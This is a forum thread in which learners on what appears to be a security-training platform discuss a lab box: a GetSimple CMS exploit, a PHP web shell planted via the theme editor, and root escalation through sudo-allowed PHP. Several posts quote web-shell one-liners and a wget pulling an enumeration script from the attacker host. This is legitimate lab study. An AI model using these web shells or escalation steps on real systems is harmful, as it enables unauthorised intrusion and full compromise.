Getting started | Knowledge Check

Hello. I stuck on final stage of module "Getting started" on academy. I'd solved first exercize with openning user.txt by metasploitable + getsimple RCE exploit. But next task is getting root.txt file is need to run LinPEAS.sh to find any ways to escalate pivilege.

So i can't figure out how to do it. The next step recomended in tutorial is " Python3 pty trick to upgrade to a pseudo TTY" but i can't run it through meterpeter or sh on local target machine.

Another vector is that "sudo -l" on target says that all users may run /usr/bin/php. I've wrote shell with "<?PHP system(\$_GET['cmd']);?>" uploaded on target and curl it but nothing happend.

Comments

  • So i now be able to spawn a bash reverse shell and run linpeas. But it says nothing intresting besides php NOPASSWD running that i know before by 'sudo -l'
    Keep searching

  • hey guys iam so stuck, the website is so slow and the upload button ist not working, i have try to upload it with metasploit but it didnt work too. And now i dont know how i can get this. Can anyone help :) please

  • Same problem of Enzo anyone have same problems?? i litteraly can't upload with the button or meta (i think is a server problem, it take up to 3 minutes to get a simple page).
    someone of the staff can please help ??

  • any news guys? still unable to complete this module

  • If anyone needs a bit of a nudge, feel free to hit me up on the Discord.

  • The site use flash player plus is so so so slow, i mean i know what to do, but the site itself is tressing, who was able to bypass that?

  • same problem as reported above, i cannot access the upload button... its not reacting to my clicks. i have tried 3 browsers.

  • This problem still exists, I'm on this part today and feel confident in what I'm going to do - loading the webpages just takes forever though so it's really painful to do anything. The main page isn't too bad but when you try to browse to any other directory its really slow.

    Seeing lots of calls to ajax.googleapis.com taking a while, and then it tries to contact 172.16.27.5 and also takes a long time.

    Not sure if that helps anyone troubleshoot the target image, hopefully it's resolved soon though.

  • Can message me for hint if your still stuck

  • Go back and REALLY pay attention to types of shells.....I mean until you're eyes bleed......I nearly cried when I realized
  • edited June 3

    Is there any other Way to get into without using metasploit(Because using metasploit was pretty simple in this one i was able to capture the Userflag without any hustle) because i was able to login as admin and i was searching possible vulns on the web but i am not able to find any successful method(I tried editing the themes for php Reverse shell but there was no response) I am still trying to look for a potential way to exploit it without using Metasploit... If anyone has found something ..we can Discuss :smile:

  • Hey guys. I'm still working on this task (almost 1 week) and I have no idea how escalate privileges. I use metasploit for it and already improve the shell but whats next? Could someone give a little nudge?

  • I'm stuck on the priv esc portion as well, I'm sure that the /usr/bin/php binary plays a role in escalating privileges, I'm just not quite sure how to proceed

  • Type your comment> @galertaw said:

    So i now be able to spawn a bash reverse shell and run linpeas. But it says nothing intresting besides php NOPASSWD running that i know before by 'sudo -l'
    Keep searching

    How were you able to transfer the Linpeas and how does your sudo -l worked? i was not able to access any other commands like sudo and echo ... but i was able to spawn a web shell using the ThemeEditor it was working but still was not able to use other commands only ls and cat and may be some more of the defaults.

  • edited June 7

    Ok so here is one Interesting thing i got ... I was able to spawn a web shell using the Following steps --
    .
    .
    1.i was able to login as admin through the page
    2.then i started the metasploit scanned and navigated the whole System for like 3-4 Days
    3.then i started googling again and found out something about GetSimple cms 3.1.15 Vulnerablity that is in theme-editor
    4. I visited the theme editor and tried to edit the php files there and was able to spawn a webshell using the One liner - <,?,p,h,p, e,c,h,o, s,h,e,l,l,_e,x,e,c,($_GET['e'].' 2>&1'); ?>
    (remove the ,(commas) I had to use them or the forum was glitching)
    5.then i tried the sudo -l command and it worked ...(remember to url-encode spaces to run commands)
    this is my progress until now...

  • Type your comment> @SPARTANone17 said:

    Ok so here is one Interesting thing i got ... I was able to spawn a web shell using the Following steps --
    .
    .
    1.i was able to login as admin through the page
    2.then i started the metasploit scanned and navigated the whole System for like 3-4 Days
    3.then i started googling again and found out something about GetSimple cms 3.1.15 Vulnerablity that is in theme-editor
    4. I visited the theme editor and tried to edit the php files there and was able to spawn a webshell using the One liner - <,?,p,h,p, e,c,h,o, s,h,e,l,l,_e,x,e,c,($_GET['e'].' 2>&1'); ?>
    (remove the ,(commas) I had to use them or the forum was glitching)
    5.then i tried the sudo -l command and it worked ...(remember to url-encode spaces to run commands)
    this is my progress until now...

    Thanks, following your steps led me to the initial shell. From here though, i had to get a true reverse shell to exploit a certain binary that sudo can run on. Gtfobins led the way for me afterwards!

  • Finally!!! Jessus...you have to be fast, otherwise the machines just dies

  • edited June 8

    Type your comment> @dewest91 said:

    Type your comment> @SPARTANone17 said:

    Ok so here is one Interesting thing i got ... I was able to spawn a web shell using the Following steps --
    .
    .
    1.i was able to login as admin through the page
    2.then i started the metasploit scanned and navigated the whole System for like 3-4 Days
    3.then i started googling again and found out something about GetSimple cms 3.1.15 Vulnerablity that is in theme-editor
    4. I visited the theme editor and tried to edit the php files there and was able to spawn a webshell using the One liner - <,?,p,h,p, e,c,h,o, s,h,e,l,l,_e,x,e,c,($_GET['e'].' 2>&1'); ?>
    (remove the ,(commas) I had to use them or the forum was glitching)
    5.then i tried the sudo -l command and it worked ...(remember to url-encode spaces to run commands)
    this is my progress until now...

    Thanks, following your steps led me to the initial shell. From here though, i had to get a true reverse shell to exploit a certain binary that sudo can run on. Gtfobins led the way for me afterwards!

    How were you able to get a true REVERSE SHELL!!!!!!!!!! i tried like 50 times till now and still i am not able to spawn a true shell i know afterwards that i have to exploit the php vulnerablity using the gtfobins but how ? please help...

  • Type your comment> @SPARTANone17 said:

    Type your comment> @dewest91 said:

    Type your comment> @SPARTANone17 said:

    Ok so here is one Interesting thing i got ... I was able to spawn a web shell using the Following steps --
    .
    .
    1.i was able to login as admin through the page
    2.then i started the metasploit scanned and navigated the whole System for like 3-4 Days
    3.then i started googling again and found out something about GetSimple cms 3.1.15 Vulnerablity that is in theme-editor
    4. I visited the theme editor and tried to edit the php files there and was able to spawn a webshell using the One liner - <,?,p,h,p, e,c,h,o, s,h,e,l,l,_e,x,e,c,($_GET['e'].' 2>&1'); ?>
    (remove the ,(commas) I had to use them or the forum was glitching)
    5.then i tried the sudo -l command and it worked ...(remember to url-encode spaces to run commands)
    this is my progress until now...

    Thanks, following your steps led me to the initial shell. From here though, i had to get a true reverse shell to exploit a certain binary that sudo can run on. Gtfobins led the way for me afterwards!

    How were you able to get a true REVERSE SHELL!!!!!!!!!! i tried like 50 times till now and still i am not able to spawn a true shell i know afterwards that i have to exploit the php vulnerablity using the gtfobins but how ? please help...

    I uploaded a php web shell on the theme editor page, then setup a listener on my local machine, and used a php reverse shell one liner.

  • edited June 13

    Type your comment> @dewest91 said:

    Type your comment> @SPARTANone17 said:

    Type your comment> @dewest91 said:

    Type your comment> @SPARTANone17 said:

    Ok so here is one Interesting thing i got ... I was able to spawn a web shell using the Following steps --
    .
    .
    1.i was able to login as admin through the page
    2.then i started the metasploit scanned and navigated the whole System for like 3-4 Days
    3.then i started googling again and found out something about GetSimple cms 3.1.15 Vulnerablity that is in theme-editor
    4. I visited the theme editor and tried to edit the php files there and was able to spawn a webshell using the One liner - <,?,p,h,p, e,c,h,o, s,h,e,l,l,_e,x,e,c,($_GET['e'].' 2>&1'); ?>
    (remove the ,(commas) I had to use them or the forum was glitching)
    5.then i tried the sudo -l command and it worked ...(remember to url-encode spaces to run commands)
    this is my progress until now...

    Thanks, following your steps led me to the initial shell. From here though, i had to get a true reverse shell to exploit a certain binary that sudo can run on. Gtfobins led the way for me afterwards!

    How were you able to get a true REVERSE SHELL!!!!!!!!!! i tried like 50 times till now and still i am not able to spawn a true shell i know afterwards that i have to exploit the php vulnerablity using the gtfobins but how ? please help...

    I uploaded a php web shell on the theme editor page, then setup a listener on my local machine, and used a php reverse shell one liner.

    BUT were you able to navigate out of the current working Directory because last time i tried i wasn't able to navigate out of the current working Directory. and thats not it how were you able to use the php webshell and listen onto your device..How were you able to use a Listner to A PHP webshell because a webshell can be accessed by using the Web browser or the cURL .
    But i am goona try it now and Explore myself I will read your answer after i complete the module :smiley:

  • edited June 13

    Type your comment> @SPARTANone17 said:

    Type your comment> @dewest91 said:

    Type your comment> @SPARTANone17 said:

    Type your comment> @dewest91 said:

    Type your comment> @SPARTANone17 said:

    Ok so here is one Interesting thing i got ... I was able to spawn a web shell using the Following steps --
    .
    .
    1.i was able to login as admin through the page
    2.then i started the metasploit scanned and navigated the whole System for like 3-4 Days
    3.then i started googling again and found out something about GetSimple cms 3.1.15 Vulnerablity that is in theme-editor
    4. I visited the theme editor and tried to edit the php files there and was able to spawn a webshell using the One liner - <,?,p,h,p, e,c,h,o, s,h,e,l,l,_e,x,e,c,($_GET['e'].' 2>&1'); ?>
    (remove the ,(commas) I had to use them or the forum was glitching)
    5.then i tried the sudo -l command and it worked ...(remember to url-encode spaces to run commands)
    this is my progress until now...

    Thanks, following your steps led me to the initial shell. From here though, i had to get a true reverse shell to exploit a certain binary that sudo can run on. Gtfobins led the way for me afterwards!

    How were you able to get a true REVERSE SHELL!!!!!!!!!! i tried like 50 times till now and still i am not able to spawn a true shell i know afterwards that i have to exploit the php vulnerablity using the gtfobins but how ? please help...

    I uploaded a php web shell on the theme editor page, then setup a listener on my local machine, and used a php reverse shell one liner.

    BUT were you able to navigate out of the current working Directory because last time i tried i wasn't able to navigate out of the current working Directory.

    Ok i was able to Get the Root flag as well ... Thanks for the help @dewest91 :smile:

  • I wonder if anyone is able to offer a helping hand as i'm unsure as how to progress, I have managed to gain a foothold by using the Get simple msf exploit and have submitted the user flag however when trying to upload LinEnum I get the 200 OK response but then followed by permission denied?

    I'm sure i'm doing something wrong (as this is the case most time) but I'm just wondering if I am missing something stupidly obvious?

    Just to be clear.. LinEnum.sh onto the target machine by using wget http://10.10.16.95:8080/LinEnum.sh then receive the following -

    '--2021-06-28 09:56:14-- http://10.10.16.95:8080/LinEnum.sh
    Connecting to 10.10.16.95:8080... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 46631 (46K) [text/x-sh]
    LinEnum.sh: Permission denied

    Cannot write to ‘LinEnum.sh’ (Permission denied).'

Sign In to comment.